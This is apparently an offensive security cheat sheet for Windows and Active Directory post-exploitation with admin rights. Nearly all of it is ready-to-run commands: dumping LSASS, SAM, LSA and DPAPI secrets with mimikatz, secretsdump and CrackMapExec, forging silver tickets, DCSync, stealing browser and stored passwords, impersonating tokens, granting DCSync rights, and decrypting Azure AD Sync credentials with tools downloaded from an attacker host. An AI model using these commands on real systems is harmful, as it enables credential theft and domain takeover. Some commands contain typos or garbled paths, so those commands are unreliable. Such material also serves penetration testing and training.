# Administrator account

## Extract credentials from LSASS

{% tabs %}
{% tab title="procdump" %}

```
procdump.exe --acepteula -ma lsass.exe lsass.dmp
```

{% endtab %}

{% tab title="mimikatz" %}

<pre><code><strong>mimikatz "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "exit"
</strong></code></pre>

{% code overflow="wrap" %}

```
mimikatz "privilege::debug" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" "exit"
```

{% endcode %}
{% endtab %}

{% tab title="Meterpreter" %}

```
load kiwi

creds_all
```

{% endtab %}

{% tab title="cme" %}

```
cme smb <ip-range> -u <user> -p <password> -M lsassy
```

{% endtab %}

{% tab title="lsassy" %}

```
lsassy -d <domain> -u <user> -p <password> <ip>
```

{% endtab %}
{% endtabs %}

## Extract Credentials from SAM

{% tabs %}
{% tab title="secretsdump" %}

```
secretsdump.py <domain>/<user>:<password>@<ip>
```

{% endtab %}

{% tab title="cme" %}

```
cme smb <ip-range> -u <user> -p <password> --sam
```

{% endtab %}

{% tab title="Meterpreter" %}

```
hashdump
```

{% endtab %}

{% tab title="registries" %}

```
reg save HKLM\SAM <file>;
reg save HKLM\SECURITY <file>;
reg save HKLM\SYSTEN <file>;

secretsdump.py -sam SAM -system SYSTEM LOCAL
```

{% endtab %}

{% tab title="mimikatz" %}

```
mimikatz "privilege::debug" "lsadump::sam" "exit"
```

{% endtab %}

{% tab title="Shadow Copy" %}
**Shadow copies**

```
diskshadow list shadows all
```

```
mklink /d c:\shadowcopy\\?\GLOBALROOT\Device\Harddisk VolumeShadowCopy\
```

{% endtab %}
{% endtabs %}

## Extract Credentials from LSA

{% tabs %}
{% tab title="cme" %}

```
cme smb <ip-range> -u <user> -p <password> --lsa
```

{% endtab %}

{% tab title="secretsdump" %}

```
secretsdump.py <domain>/<user>:<password>@<ip>
```

```
secretsdump.py -security <security-file> -system <system-file> LOCAL
```

{% endtab %}

{% tab title="reg.py" %}

```
reg.py <domain>/<user>:<password>@<ip> backup -o '\\<smb-ip>\share'
```

{% endtab %}
{% endtabs %}

## Extract dpapi

{% tabs %}
{% tab title="donPAPI" %}

```
DonPAPI.py <domain>/<user>:<password>@<target>
```

{% endtab %}

{% tab title="mimikatz" %}

```
mimikatz.exe "sekurlsa::dpapi"
```

{% endtab %}

{% tab title="Untitled" %}

```
secretsdump.py <domain>/<user>:<password>@<ip>
```

{% endtab %}
{% endtabs %}

## Extract kerberos tickets

```
sekurlsa::tickets
```

## Silver Tickets

**Prerequisites**

* SPN password hash
* Domain SID
* Target SPN

### Silver Ticket Forgery

**NTLM Hash**

We have to load mimikatz and extract the NTLM hash:

```batchfile
iwr -UseDefaultCredentials http://<RHOST>
.\mimikatz.exe
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
NTLM: 4d28cf5252d39971419580a51484ca09
```

**Domain SID**

Then to obtain the SID use whoami:

```
whoami /user                           
SID: S-1-5-21-1987370270-658905905-1781884369-1105 (S-1-5-21-1987370270-658905905-1781884369)
```

**Ticket Forging**

With that information we can forge the ticket:

```
mimikatz # kerberos::golden /sid:S-1-5-21-1987370270-658905905-1781884369 /domain:<DOMAIN> /ptt /target:<RHOST> /service:http /rc4:4d28cf5252d39971419580a51484ca09 /user:<attacker_user>
```

**Using the ticket**

```
klist
iwr -UseDefaultCredentials http://<RHOST>
```

## DCSync

{% tabs %}
{% tab title="mimikatz" %}

```
.\mimikatz.exe
mimikatz # lsadump::dcsync /user:<DOMAIN>\<USERNAME>
mimikatz # lsadump::dcsync /user:<DOMAIN>\Administrator
```

{% endtab %}

{% tab title="impacket-secretsdump" %}
**NTLM Hash of one user**

```
impacket-secretsdump -just-dc-user <user_target> <domain>/<user>:'<pass>'@<ip>
```

**Dump all hashes**

```
impacket-secretsdump <domain>/<user>:'<pass>'@<ip>
```

{% endtab %}
{% endtabs %}

## Search Password Files

```
findstr /si 'password' *.txt *.xml .docx
```

## Search Stored Password

```
lazagne.exe all
```

## Chrome

```
%appdata%\Local\Google\Chrome\User Data\Default
```

```
SharpChromium.exe
```

## Token Manipulation

{% tabs %}
{% tab title="incognito" %}

```
.\incognito.exe list_tokens -u
```

```
.\incognito.exe execute -c "<domain>\<user>" powershell.exe
```

{% endtab %}

{% tab title="Meterpreter" %}

```
use incognito
```

```
impersonate_token <domain>\\<user>
```

{% endtab %}

{% tab title="cme" %}

```
cme smb <ip> -u <user> -p <password> -M impersonate
```

{% endtab %}
{% endtabs %}

## **Account Operators Group Membership**

**Add User**

```
net user <USERNAME> <PASSWORD> /add /domain
net group "Exchange Windows Permissions" /add <USERNAME>
```

**Import PowerView**

```
powershell -ep bypass
. .\PowerView.ps1
```

**Add DCSync Rights**

```
$pass = convertto-securestring '<PASSWORD>' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('<DOMAIN>\<USERNAME>', $pass)
Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=<DOMAIN>,DC=<DOMAIN>" -PrincipalIdentity <USERNAME> -Rights DCSync
```

**DCSync**

```
impacket-secretsdump '<USERNAME>:<PASSWORD>@<RHOST>'
```

## Azure Admin Group Membership

If an user is Admin of Azure Group we can try to exploit Azure AD Sync to grab the administrator password:

{% embed url="<https://github.com/VbScrub/AdSyncDecrypt/releases/tag/v1.0>" %}

```
iwr <IP>/AdDecryp.exe -o AdDecrypt.exe
iwr <IP>/mcrypt.dll -o mcrypt.dll
```

Then run this command being inside the path C:\Program Files\Microsoft Azure AD Sync\Bin :

```
C:\Temp\AdDecrypt.exe -FullSQL
```